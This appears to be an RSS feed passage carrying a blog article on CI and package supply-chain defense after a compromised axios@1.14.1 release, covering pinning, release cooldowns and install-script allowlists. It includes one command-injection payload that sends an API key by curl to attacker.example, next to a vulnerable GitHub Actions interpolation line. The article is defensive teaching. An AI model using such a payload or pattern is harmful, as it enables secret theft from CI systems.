&lt;p&gt;If you only take three things from this: pin every external CI reference (Action / include / plugin / orb / shared-library) to a content-addressed identifier; scope every CI permission block to least privilege; set a &lt;code&gt;minimumReleaseAge&lt;/code&gt; of at least 3 days on your package manager. Put the first two as required status checks on &lt;code&gt;main&lt;/code&gt;. Together they would have stopped &lt;code&gt;axios@1.14.1&lt;/code&gt; cold for any pipeline running them, and tj-actions cold for every repo that ran it. The other nine boundaries are the layers behind that.&lt;/p&gt;

&lt;p&gt;For a regulated workload (healthcare staffing means downtime maps to nurses missing shifts at hospitals, so we weight availability higher than most SaaS), the calibration looks like this: we tolerated +5 minutes of PR latency, but rejected anything that could block a hotfix at 2am. Your domain's calibration will differ. Write down why.&lt;/p&gt;

&lt;p&gt;If you've calibrated &lt;code&gt;minimumReleaseAge&lt;/code&gt; differently, I want to hear the number and why, especially if you're in fintech or healthcare with stricter patch SLAs. Tell me I'm wrong about any of the trade-offs in the comments. I'd rather argue about the number here than discover the right answer at 2am during a credential-rotation drill because some maintainer's npm token leaked at lunch.&lt;/p&gt;




&lt;h2&gt;
  
  
  Appendix: minimal viable starter pack
&lt;/h2&gt;

&lt;p&gt;A team that has none of these in place can ship a meaningful subset in roughly a week, regardless of stack:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Lock manifests committed; CI install command refuses to mutate them.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;minimumReleaseAge&lt;/code&gt; (pnpm) or Renovate equivalent set to ≥ 3 days.&lt;/li&gt;
&lt;li&gt;Lifecycle-script default-deny: &lt;code&gt;pnpm.onlyBuiltDependencies&lt;/code&gt; allowlist + &lt;code&gt;--ignore-scripts&lt;/code&gt; in CI; equivalent gate per stack.&lt;/li&gt;
&lt;li&gt;Base images pinned by &lt;code&gt;@sha256:&lt;/code&gt; digest. Non-root &lt;code&gt;USER&lt;/code&gt; in every production image.&lt;/li&gt;
&lt;li&gt;Workflow / pipeline default-deny on permissions; per-job grants.&lt;/li&gt;
&lt;li&gt;Mutable references (&lt;code&gt;uses:&lt;/code&gt;, &lt;code&gt;include:&lt;/code&gt;, plugins, orbs, shared libs) pinned to commit SHAs; CI gate fails un-pinned PRs.&lt;/li&gt;
&lt;li&gt;Untrusted CI input passed via env vars, never interpolated into shell.&lt;/li&gt;
&lt;li&gt;Image signing via cosign + Sigstore (or stack-equivalent provenance).&lt;/li&gt;
&lt;li&gt;PR-time secret scanning (gitleaks / trufflehog).&lt;/li&gt;
&lt;li&gt;PR-time dependency CVE gate (&lt;code&gt;pnpm audit&lt;/code&gt; + per-stack equivalents above) with documented expiry-forced allowlist.&lt;/li&gt;
&lt;li&gt;Logger redaction at framework level for auth headers, cookies, password / token / secret keys.&lt;/li&gt;
&lt;li&gt;CODEOWNERS covering every file in this list.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Each item is a few lines of configuration. Total cost is roughly the week described above for a multi-project monorepo; smaller repos proportionally less. The benefit, in our case, was being able to stop checking my phone on Sundays.&lt;/p&gt;

</description>
      <category>security</category>
      <category>devsecops</category>
      <category>axios</category>
      <category>supplychain</category>
    </item>
    <item>
      <title>Twelve Trust Boundaries: A Field Guide to Supply-Chain Defense After axios@1.14.1</title>
      <dc:creator>Ahmad Kanj</dc:creator>
      <pubDate>Fri, 08 May 2026 12:38:49 +0000</pubDate>
      <link>https://dev.to/aws-builders/twelve-trust-boundaries-a-field-guide-to-supply-chain-defense-after-54ok</link>
      <guid>https://dev.to/aws-builders/twelve-trust-boundaries-a-field-guide-to-supply-chain-defense-after-54ok</guid>
      <description>&lt;p&gt;On March 30, 2026, an attacker who had stolen an &lt;code&gt;axios&lt;/code&gt; maintainer's npm publish credentials pushed &lt;code&gt;axios@1.14.1&lt;/code&gt; to the registry. The version looked like a normal patch a single-digit bump from 1.14.0. It was live for roughly three hours before the maintainer rotated credentials and the version was unpublished.&lt;/p&gt;

&lt;p&gt;Three hours, on a Monday, during peak CI/CD hours across multiple time zones. Any team running &lt;code&gt;pnpm install&lt;/code&gt; or &lt;code&gt;npm install&lt;/code&gt; against a &lt;code&gt;^1.14.0&lt;/code&gt; constraint pulled &lt;code&gt;1.14.1&lt;/code&gt; automatically. (&lt;code&gt;^1.14.0&lt;/code&gt; means "any 1.x.y ≥ 1.14.0" most package managers express the same idea: &lt;code&gt;~=&lt;/code&gt; in pip, &lt;code&gt;^&lt;/code&gt; in Cargo, &lt;code&gt;~&amp;gt;&lt;/code&gt; in Gemfile.) No CVE was published during the window. SAST tools had nothing to flag.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;axios@1.14.1&lt;/code&gt; added one new transitive dependency (a dependency-of-a-dependency, pulled in indirectly): &lt;code&gt;plain-crypto-js@4.2.1&lt;/code&gt;. That package's &lt;code&gt;postinstall&lt;/code&gt; script, a hook the package manager runs automatically after install, the canonical Node footgun, with analogues in pip's &lt;code&gt;setup.py&lt;/code&gt; build hooks, Ruby's &lt;code&gt;gem extconf&lt;/code&gt;, and Cargo's &lt;code&gt;build.rs&lt;/code&gt; ran &lt;code&gt;node setup.js&lt;/code&gt;, which downloaded a Python-based RAT (Remote Access Trojan) from a C2 (command-and-control) server, exfiltrated environment variables and cloud credentials, and attempted to establish persistence on the build host. The compromise wouldn't have been visible to anyone glancing at the lockfile diff. A new transitive in a stable utility, the kind of churn most teams approve without thinking.&lt;/p&gt;

&lt;p&gt;Three hours is forever in CI. By the time npm pulled the version, the bytes had already shipped to thousands of build hosts.&lt;/p&gt;

&lt;p&gt;Two weeks before that incident, I was reading through a workflow in our own repo that lets engineers trigger an LLM code review by commenting &lt;code&gt;/review&lt;/code&gt; on a pull request. I stopped on this line:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# .github/workflows/opencode-review.yml:108&lt;/span&gt;
&lt;span class="s"&gt;COMMENT_BODY="${{ github.event.comment.body || '' }}"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;if:&lt;/code&gt; block above it gated only on &lt;code&gt;startsWith(comment.body, '/review')&lt;/code&gt;. There was no &lt;code&gt;comment.author_association&lt;/code&gt; check. Anyone who could comment on a PR including a drive-by from a public fork could trigger this workflow. The job loaded &lt;code&gt;OPENROUTER_API_KEY&lt;/code&gt; from AWS Secrets Manager, and ran with &lt;code&gt;pull-requests: write&lt;/code&gt;, &lt;code&gt;issues: write&lt;/code&gt;, and AWS OIDC (OpenID Connect short-lived workload identity, used here instead of long-lived API keys) in scope.&lt;/p&gt;

&lt;p&gt;A comment body of &lt;code&gt;/review"; curl -X POST attacker.example/x -d "$OPENROUTER_API_KEY&lt;/code&gt; would have run on the next CI build. CWE-78: OS command injection, untrusted input concatenated into a shell command. Found, scoped, fixed in a four-line diff.&lt;/p&gt;

&lt;p&gt;Two attacks, very different mechanics. axios was a credential-theft → publish → postinstall chain at the registry boundary. The CWE-78 was a comment-string interpolation at the workflow boundary. The connection: in both cases the attacker didn't write code "in" the repo. They injected code by abusing a trust relationship we trusted axios's npm releases; we trusted GitHub event input. The perimeter is no longer your application. It's everything that runs before, during, and after your build, and the defense has to live in those same places.&lt;/p&gt;

&lt;p&gt;I work on a multiple projects monorepo (a single git repository hosting many services and libraries, JavaScript and TypeScript in our case, but the framework below maps to any monorepo or polyrepo, any language). A month after &lt;code&gt;axios@1.14.1&lt;/code&gt; shipped, a Slack message landed in our channel: &lt;em&gt;"we have Wiz, SonarCloud, gitleaks, Renovate but are we good?"&lt;/em&gt; Seven days later I had a triaged P0/P1/P2 list 12 P0s (auth, secrets, registry trust), 18 P1s (pinning, permissions, lifecycle), 17 P2s (logging, SBOM, hardening) and a branch with 48 files changed and +2,487 / −646 lines of supply-chain controls.&lt;/p&gt;

&lt;p&gt;What follows is the framework I use, the specific findings I hit, the trade-offs I made, and the equivalent control in your stack whether your repo is npm, pip, Maven, Go modules, Cargo, or RubyGems; whether your CI is GitHub Actions, GitLab, Buildkite, or Jenkins. The worked example here is pnpm and GitHub Actions because that's where I shipped it. The boundaries are stack-neutral.&lt;/p&gt;




&lt;h2&gt;
  
  
  Where the attack surface actually lives now
&lt;/h2&gt;

&lt;p&gt;Your application's attack surface is bounded. A handful of endpoints, an auth system, a database. You can audit it, pen-test it, threat-model it on a whiteboard in an afternoon.&lt;/p&gt;

&lt;p&gt;Your supply chain is not bounded. It's the transitive closure of every package you import, every CI Action / GitLab include / Buildkite plugin in every workflow, every base image &lt;code&gt;FROM&lt;/code&gt; line in every Dockerfile, every binary your CI runner downloads at build time, every preset, every fork, every "trusted" community helper.&lt;/p&gt;

&lt;p&gt;The math doesn't work in your favour. A typical mid-sized application resolves on the order of 1,000–3,000 transitive dependencies in its lockfile (the resolved-versions file your package manager writes &lt;code&gt;package-lock.json&lt;/code&gt;, &lt;code&gt;Pipfile.lock&lt;/code&gt;, &lt;code&gt;Cargo.lock&lt;/code&gt;, &lt;code&gt;Gemfile.lock&lt;/code&gt;, &lt;code&gt;go.sum&lt;/code&gt;). A typical CI pipeline chains 10–30 third-party Actions / plugins. Across a multi-year horizon, the probability that none of those maintainers gets phished, social-engineered or leaks a publish token approaches zero.&lt;/p&gt;

&lt;p&gt;Recent incidents to anchor frequency:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;2018: &lt;code&gt;event-stream&lt;/code&gt; (npm advisory 737):&lt;/strong&gt; maintainer handed package to a malicious "helpful contributor" who added a payload in a sub-dependency. Targeted exfiltration of private keys from the Copay/&lt;code&gt;copay-dash&lt;/code&gt; Bitcoin wallet specifically conditional payload, no effect on other consumers.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2021: &lt;code&gt;ua-parser-js&lt;/code&gt;:&lt;/strong&gt; npm account takeover. Crypto miner and credential theft on every install. ~4 hours before takedown.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2021: &lt;code&gt;codecov&lt;/code&gt; bash uploader (CVE-2021-32699):&lt;/strong&gt; modified upload script harvested CI environment variables. HashiCorp, Twilio, Confluent affected.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2022: &lt;code&gt;node-ipc&lt;/code&gt; (CVE-2022-23812):&lt;/strong&gt; maintainer protestware. Wiped files on Russian and Belarusian IPs.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2024: &lt;code&gt;xz-utils&lt;/code&gt; (CVE-2024-3094):&lt;/strong&gt; multi-year insider. The "Jia Tan" persona spent ~2 years building trust before merging an OpenSSH authentication backdoor via &lt;code&gt;liblzma&lt;/code&gt; linkage with a specific Ed448 key. Discovered by Postgres engineer Andres Freund investigating ~500 ms of &lt;code&gt;sshd&lt;/code&gt; login latency, before the affected versions reached most stable distributions.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2024: &lt;code&gt;@solana/web3.js&lt;/code&gt; (GHSA-7493-mqf3-cv5g):&lt;/strong&gt; npm token compromise. Wallet drainer in published versions for ~5 hours.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2025: &lt;code&gt;tj-actions/changed-files&lt;/code&gt; (CVE-2025-30066):&lt;/strong&gt; chained through &lt;code&gt;reviewdog/action-setup&lt;/code&gt; (CVE-2025-30154) → stolen PAT → retroactive semver-tag rewrite. ~218 repos confirmed leaked secrets out of ~23,000 references per StepSecurity / Wiz post-incident telemetry.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2025: Shai-Hulud npm worm:&lt;/strong&gt; the first true self-replicating npm worm. A &lt;code&gt;postinstall&lt;/code&gt; harvested maintainer npm tokens and re-published the worm into every other package the victim maintained. ~180 packages compromised across multiple maintainer namespaces.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2025: Nx &lt;code&gt;s1ngularity&lt;/code&gt; worm:&lt;/strong&gt; npm postinstall on compromised Nx versions harvested GitHub PATs, SSH keys, and crypto wallets from build hosts; backdoored downstream &lt;code&gt;nx-init-&lt;/code&gt; repositories. Directly relevant to anyone on an Nx monorepo.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2026: &lt;code&gt;axios@1.14.1&lt;/code&gt;:&lt;/strong&gt; as above.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Strip the variations and you get four primitives that every modern attack chains: &lt;strong&gt;dependency injection&lt;/strong&gt; (typosquats, dependency confusion, maintainer compromise), &lt;strong&gt;build-time injection&lt;/strong&gt; (postinstall hooks, curl-bashed installers, malicious Actions), &lt;strong&gt;mutable-reference rewrite&lt;/strong&gt; (tag rewrites, branch tracking, CDN URLs without integrity), and &lt;strong&gt;trust-relationship abuse&lt;/strong&gt; (compromise a tooling vendor, an MFA, a token in a CI log). axios chained (4) → (1) → (2). tj-actions chained (4) → (1) → (3) → (2). Any single layer of defense would have broken either chain. Most repos had none of them.&lt;/p&gt;




&lt;h2&gt;
  
  
  The twelve boundaries
&lt;/h2&gt;

&lt;p&gt;Security engineers thinks in &lt;strong&gt;boundaries&lt;/strong&gt; points where trust transfers from one entity to another. Each boundary is a place attackers operate and a place defenders need a control. The twelve below split into three phases what enters your repo (1–4), what runs during your build (5–9), what ships at runtime (10–12) plus a final section on what to do when one of them fails. Some will.&lt;/p&gt;

&lt;h3&gt;
  
  
  Phase 1 Source-side: what enters your repo
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Boundary 1: Source → Repository (Who can write to &lt;code&gt;main&lt;/code&gt;?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; insider with too-broad write access; accidental merge of malicious code.&lt;br&gt;
&lt;strong&gt;Controls:&lt;/strong&gt; branch protection, required reviewers, CODEOWNERS for security-sensitive paths (workflows, Dockerfiles, dependency manifests). Force-push protection on protected branches. Required status checks must include the controls below.&lt;/p&gt;

&lt;p&gt;The forge-level (GitHub / GitLab / Bitbucket / Gerrit) primitives differ; the rule is identical: humans cannot push to &lt;code&gt;main&lt;/code&gt;; only the merge bot can, and only after policy passes.&lt;/p&gt;
&lt;h4&gt;
  
  
  Boundary 2: Maintainer → Package (Is this dependency safe?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; typosquats, dependency confusion (publishing a public package whose name shadows a private one, tricking the resolver), maintainer compromise. &lt;code&gt;axios@1.14.1&lt;/code&gt; is the canonical example of the third published from a stolen credential, malicious for three hours, gone afterwards.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls registry-time:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Pin to immutable identifiers.&lt;/strong&gt; Lockfile committed; exact-version constraints; no caret/tilde ranges in production dependencies; &lt;code&gt;pnpm install --frozen-lockfile&lt;/code&gt; (or &lt;code&gt;npm ci&lt;/code&gt;, &lt;code&gt;pip install --require-hashes&lt;/code&gt;, &lt;code&gt;cargo --frozen --locked&lt;/code&gt;, &lt;code&gt;mvn -B verify&lt;/code&gt;, &lt;code&gt;bundle install --frozen&lt;/code&gt;, &lt;code&gt;dotnet restore --locked-mode&lt;/code&gt;) in CI. The general invariant: every dependency entry resolves to a content-addressed artifact, not a URL.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Cooldown on freshly published versions.&lt;/strong&gt; Reject packages younger than N days, on the premise that fresh-publish malware is detected and yanked within 24–72 hours. The premise has limits &lt;code&gt;xz-utils&lt;/code&gt; ran for ~2 years undetected so this control buys hours-to-days of latency, not certainty.&lt;br&gt;
&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;   &lt;span class="c1"&gt;# pnpm-workspace.yaml value is in minutes; 4320 min = 72 h = 3 days&lt;/span&gt;
   &lt;span class="na"&gt;minimumReleaseAge&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;4320&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;&lt;code&gt;axios@1.14.1&lt;/code&gt; was unpublished within three hours. With &lt;code&gt;minimumReleaseAge: 4320&lt;/code&gt;, pnpm would have refused to install it for 72 hours after publish. By the time the install would have unblocked, the malicious version was already gone.&lt;/p&gt;

&lt;p&gt;Stack-neutral: pnpm has this natively; Renovate's &lt;code&gt;minimumReleaseAge&lt;/code&gt; config covers npm, Maven, PyPI, Go, Cargo, NuGet, RubyGems, Helm, Docker, GH Actions, Terraform any ecosystem Renovate manages. For stacks without native or Renovate support, layer reputation signals: &lt;strong&gt;Socket&lt;/strong&gt; (behavioural risk score), &lt;strong&gt;Phylum&lt;/strong&gt; (heuristic quarantine), &lt;strong&gt;OSV-Scanner&lt;/strong&gt; + &lt;strong&gt;EPSS&lt;/strong&gt; scores for exploit-likelihood prioritisation, &lt;strong&gt;OpenSSF Scorecard&lt;/strong&gt; for upstream maintenance health, &lt;code&gt;npm audit signatures&lt;/code&gt; for registry signature verification.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Provenance.&lt;/strong&gt; Where available, prefer packages published with provenance attestations. &lt;code&gt;npm publish --provenance&lt;/code&gt; (since npm 9.5) records a signed Sigstore provenance entry binding the published tarball to the GitHub Actions workflow that built it. PyPI Trusted Publishers + PEP 740 attestations are the Python equivalent. Maven Central PGP signatures + &lt;code&gt;sigstore-maven-plugin&lt;/code&gt; for Java. Provenance doesn't stop a credential-theft attack like axios the malicious workflow would still produce a signed entry but it gives forensics a starting point.&lt;/li&gt;
&lt;/ol&gt;
&lt;h4&gt;
  
  
  Boundary 3: Registry → Lockfile (Is the resolved artifact what we think it is?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; registry compromise, off-registry tarballs without integrity, mid-flight tampering.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; lockfile committed; integrity hash (&lt;code&gt;sha512:&lt;/code&gt;, &lt;code&gt;sha256:&lt;/code&gt;, OCI digest) on every entry; CI install command refuses to mutate the lockfile. &lt;strong&gt;Easy thing to miss:&lt;/strong&gt; a lockfile entry like &lt;code&gt;tarball: https://cdn.somehost.com/foo.tgz&lt;/code&gt; without an &lt;code&gt;integrity:&lt;/code&gt; field is functionally &lt;code&gt;latest&lt;/code&gt;. Audit yours for entries where the hash field is empty or pointing to a URL the registry doesn't verify.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# tools/scripts/verify-supply-chain.sh runs in CI&lt;/span&gt;
&lt;span class="c"&gt;# Fails if the lockfile contains any off-registry tarball not on this allowlist.&lt;/span&gt;
&lt;span class="nv"&gt;EXPECTED_TARBALLS&lt;/span&gt;&lt;span class="o"&gt;=(&lt;/span&gt;
  &lt;span class="s2"&gt;"https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz"&lt;/span&gt;  &lt;span class="c"&gt;# SheetJS withdrew xlsx from npm in 2023&lt;/span&gt;
&lt;span class="o"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This single grep-equivalent check would also have flagged the &lt;code&gt;axios@1.14.1&lt;/code&gt; situation early in retrospect: a brand-new transitive (&lt;code&gt;plain-crypto-js@4.2.1&lt;/code&gt;) appeared in the lockfile diff. A mandatory PR-time review on lockfile additions catches what the eye doesn't.&lt;/p&gt;

&lt;p&gt;The general invariant translates: pip's &lt;code&gt;--require-hashes&lt;/code&gt;, Cargo's checksum field, Maven's &lt;code&gt;--strict-checksums&lt;/code&gt;, NuGet package signing, Go's module sum database every modern package manager has the primitive. The discipline is auditing for entries where it isn't enforced.&lt;/p&gt;

&lt;h4&gt;
  
  
  Boundary 4: Install → Lifecycle scripts (What runs on install?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; malicious lifecycle hooks. The axios attack's payload ran here. &lt;code&gt;plain-crypto-js@4.2.1&lt;/code&gt;'s entire malicious behaviour was a &lt;code&gt;postinstall: node setup.js&lt;/code&gt;. Without that hook, the package would have sat on disk doing nothing until something &lt;code&gt;require()&lt;/code&gt;'d it and &lt;code&gt;axios&lt;/code&gt; doesn't import &lt;code&gt;plain-crypto-js&lt;/code&gt;. The postinstall was the only thing that turned a passive disk write into RCE during install.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Default-deny on install scripts&lt;/strong&gt;, allowlist of who may run them:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="w"&gt;   &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
     &lt;/span&gt;&lt;span class="nl"&gt;"pnpm"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
       &lt;/span&gt;&lt;span class="nl"&gt;"onlyBuiltDependencies"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
         &lt;/span&gt;&lt;span class="s2"&gt;"esbuild"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
         &lt;/span&gt;&lt;span class="s2"&gt;"@swc/core"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
         &lt;/span&gt;&lt;span class="s2"&gt;"@datadog/native-iast-taint-tracking"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
         &lt;/span&gt;&lt;span class="s2"&gt;"prisma"&lt;/span&gt;&lt;span class="w"&gt;
       &lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
     &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
   &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;plain-crypto-js&lt;/code&gt; would not have been on any team's allowlist. &lt;code&gt;pnpm install --ignore-scripts&lt;/code&gt; (read-only CI workflows) and &lt;code&gt;onlyBuiltDependencies&lt;/code&gt; (pnpm 10) each, independently, neutralise the postinstall vector.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Behavioural quarantine.&lt;/strong&gt; &lt;code&gt;Socket&lt;/code&gt; and &lt;code&gt;Phylum&lt;/code&gt; analyse new transitives for suspicious patterns (network calls, file-system access, dynamic eval) before they reach your lockfile. &lt;code&gt;npq&lt;/code&gt; wraps &lt;code&gt;npm install&lt;/code&gt; to prompt before installing freshly published packages. None of these would catch a sufficiently subtle payload, but &lt;code&gt;plain-crypto-js&lt;/code&gt;'s &lt;code&gt;node setup.js&lt;/code&gt; → C2 download is exactly the shape they flag.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Build-host sandboxing.&lt;/strong&gt; Run installs inside an ephemeral container with no network egress except to the registry; or use Bubblewrap / Firejail / Chainguard's hardened images. Defence-in-depth for the case where the lifecycle gate fails open.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;The limit:&lt;/strong&gt; lifecycle gates block &lt;code&gt;preinstall&lt;/code&gt; / &lt;code&gt;install&lt;/code&gt; / &lt;code&gt;postinstall&lt;/code&gt;. They do not prevent module-load-time top-level execution when an attacker-controlled package gets &lt;code&gt;require()&lt;/code&gt;'d or &lt;code&gt;import&lt;/code&gt;'d during &lt;code&gt;vitest&lt;/code&gt;, &lt;code&gt;tsc&lt;/code&gt;, &lt;code&gt;eslint&lt;/code&gt;, or any other tool that imports your code graph. The &lt;code&gt;minimumReleaseAge&lt;/code&gt; cooldown (Boundary 2) is the layer behind that.&lt;/p&gt;

&lt;p&gt;Stack equivalents: pip's risky surface is &lt;code&gt;setup.py&lt;/code&gt; install hooks (mitigate with &lt;code&gt;--only-binary=:all:&lt;/code&gt;); Ruby's is &lt;code&gt;gem install&lt;/code&gt; running &lt;code&gt;extconf.rb&lt;/code&gt;; Cargo's is &lt;code&gt;build.rs&lt;/code&gt; (sandbox via Bazel &lt;code&gt;rules_rust&lt;/code&gt; or &lt;code&gt;cargo-deny&lt;/code&gt; bans); .NET's modern PackageReference does not run scripts (legacy &lt;code&gt;packages.config&lt;/code&gt; does); Maven and Gradle's are build plugins (audit &lt;code&gt;&amp;lt;build&amp;gt;&amp;lt;plugins&amp;gt;&lt;/code&gt; and &lt;code&gt;buildscript { dependencies }&lt;/code&gt;).&lt;/p&gt;

&lt;h3&gt;
  
  
  Phase 2 Build-side: what runs during your build
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Boundary 5: Source → Image (Is our build environment trustworthy?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; base image tag rewrite, secrets baked into image layers.&lt;br&gt;
&lt;strong&gt;Controls:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Pin every &lt;code&gt;FROM&lt;/code&gt; by &lt;code&gt;@sha256:&amp;lt;digest&amp;gt;&lt;/code&gt;.&lt;/strong&gt; Tags are mutable; digests are content-addressed (the SHA changes if the bytes change, so a rewrite is detectable).
&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;   FROM node:20.11.1-alpine3.19@sha256:735dd688da64d22ebd9... AS base
   USER node
   CMD ["node", "dist/main.js"]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Drop privileges with &lt;code&gt;USER&lt;/code&gt; before &lt;code&gt;CMD&lt;/code&gt;.&lt;/strong&gt; For Node images: &lt;code&gt;USER node&lt;/code&gt;. For nginx: switch to &lt;code&gt;nginxinc/nginx-unprivileged&lt;/code&gt; (drop-in non-root replacement listening on 8080).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Never put secrets in &lt;code&gt;ARG&lt;/code&gt; defaults&lt;/strong&gt; they persist in &lt;code&gt;docker history&lt;/code&gt;. Use BuildKit &lt;code&gt;--mount=type=secret&lt;/code&gt; for build-time secrets.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Hermetic builds for the highest tier.&lt;/strong&gt; Bazel &lt;code&gt;rules_oci&lt;/code&gt;, Nix &lt;code&gt;dockerTools&lt;/code&gt;, Chainguard's &lt;code&gt;apko&lt;/code&gt; + &lt;code&gt;melange&lt;/code&gt; produce reproducible images where every byte is content-addressed back to source. Overkill for most teams; required for SLSA L3+.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h4&gt;
  
  
  Boundary 6: Image → Registry (Can downstream verify what we shipped?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; image tag rewrite at the registry; image swap; "did we actually ship this build?" forensics gap.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; &lt;strong&gt;cosign keyless signing via Sigstore.&lt;/strong&gt; Sigstore is a free signing service; &lt;strong&gt;Fulcio&lt;/strong&gt; is its short-lived certificate authority; &lt;strong&gt;Rekor&lt;/strong&gt; is its public transparency log; the &lt;strong&gt;SET&lt;/strong&gt; (Signed Entry Timestamp) is Rekor's tamper-proof timestamp binding the signature to a moment when the cert was still valid. GitHub Actions OIDC issues a short-lived signing identity, Fulcio mints a certificate valid for ~10 minutes, and the signature is recorded in Rekor.&lt;/p&gt;

&lt;p&gt;Treat Rekor as load-bearing, not optional. The Fulcio cert expires almost immediately; what makes a keyless signature verifiable hours or years later is the Rekor inclusion proof. A &lt;code&gt;cosign verify&lt;/code&gt; that doesn't check the SET is meaningless after cert expiry.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Verify with workflow-path anchoring&lt;/strong&gt;, not a loose org regex:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;cosign verify &amp;lt;image&amp;gt;@&amp;lt;digest&amp;gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-identity-regexp&lt;/span&gt; &lt;span class="s2"&gt;"^https://github&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;com/yourorg/yourrepo/&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;github/workflows/release&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;yml@refs/heads/main$"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-oidc-issuer&lt;/span&gt; &lt;span class="s2"&gt;"https://token.actions.githubusercontent.com"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
